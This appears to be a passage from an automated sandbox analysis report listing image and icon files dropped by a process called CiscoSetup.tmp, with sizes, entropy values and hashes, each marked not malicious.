                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.01754566314674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                                                                                  MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                                                                                  SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                                                                                  SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                                                                                  SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1577
                                                                                                                                                                                                  Entropy (8bit):5.942243839150427
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                                                                                  MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                                                                                  SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                                                                                  SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                                                                                  SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12068
                                                                                                                                                                                                  Entropy (8bit):7.961027992023309
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                                                                                  MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                                                                                  SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                                                                                  SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                                                                                  SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2531
                                                                                                                                                                                                  Entropy (8bit):7.8827223365027725
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                                                                                  MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                                                                                  SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                                                                                  SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                                                                                  SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4732129504366194
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                                                                                  MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                                                                                  SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                                                                                  SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                                                                                  SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.010961844615086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3683
                                                                                                                                                                                                  Entropy (8bit):7.90204028759812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4455
                                                                                                                                                                                                  Entropy (8bit):7.908038022091361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26674
                                                                                                                                                                                                  Entropy (8bit):7.935979285003627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28939
                                                                                                                                                                                                  Entropy (8bit):7.960017526195935
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29327
                                                                                                                                                                                                  Entropy (8bit):7.967732566337996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31702
                                                                                                                                                                                                  Entropy (8bit):7.968827949628217
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26026
                                                                                                                                                                                                  Entropy (8bit):7.927985837095832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5803
                                                                                                                                                                                                  Entropy (8bit):7.950077949239442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                                                                                  MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                                                                                  SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                                                                                  SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                                                                                  SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29723
                                                                                                                                                                                                  Entropy (8bit):7.971507308971378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                                                                                  MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                                                                                  SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                                                                                  SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                                                                                  SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1264
                                                                                                                                                                                                  Entropy (8bit):7.787798189239225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                                                                                  MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                                                                                  SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                                                                                  SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                                                                                  SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14308
                                                                                                                                                                                                  Entropy (8bit):7.981829207860698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                                                                                  MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                                                                                  SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                                                                                  SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                                                                                  SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13810
                                                                                                                                                                                                  Entropy (8bit):7.9753795366170355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                                                                                  MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                                                                                  SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                                                                                  SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                                                                                  SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10811
                                                                                                                                                                                                  Entropy (8bit):7.9725003667897125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                                                                                  MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                                                                                  SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                                                                                  SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                                                                                  SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13727
                                                                                                                                                                                                  Entropy (8bit):7.982847912604664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                                                                                  MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                                                                                  SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                                                                                  SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                                                                                  SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                  Entropy (8bit):7.975971786407776
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10710
                                                                                                                                                                                                  Entropy (8bit):7.9641316394298025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12252
                                                                                                                                                                                                  Entropy (8bit):7.977665916091742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12258
                                                                                                                                                                                                  Entropy (8bit):7.976396258951981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8950
                                                                                                                                                                                                  Entropy (8bit):7.969730039207073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12436
                                                                                                                                                                                                  Entropy (8bit):7.977312501768235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12780
                                                                                                                                                                                                  Entropy (8bit):7.975972884511595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9482
                                                                                                                                                                                                  Entropy (8bit):7.969513879342907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11747
                                                                                                                                                                                                  Entropy (8bit):7.9792800328394184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                                                                                  MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                                                                                  SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                                                                                  SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                                                                                  SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12124
                                                                                                                                                                                                  Entropy (8bit):7.978101118980993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                                                                                  MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                                                                                  SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                                                                                  SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                                                                                  SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8594
                                                                                                                                                                                                  Entropy (8bit):7.973082494080156
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                                                                                  MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                                                                                  SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                                                                                  SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                                                                                  SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4117
                                                                                                                                                                                                  Entropy (8bit):7.943813748161345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                                                                                  MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                                                                                  SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                                                                                  SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                                                                                  SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4267
                                                                                                                                                                                                  Entropy (8bit):7.94257084168463
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                                                                                  MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                                                                                  SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                                                                                  SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                                                                                  SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4052
                                                                                                                                                                                                  Entropy (8bit):7.943954771539964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                                                                                  MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                                                                                  SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                                                                                  SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                                                                                  SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):6.305816801627044
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                                                                                  MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                                                                                  SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                                                                                  SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
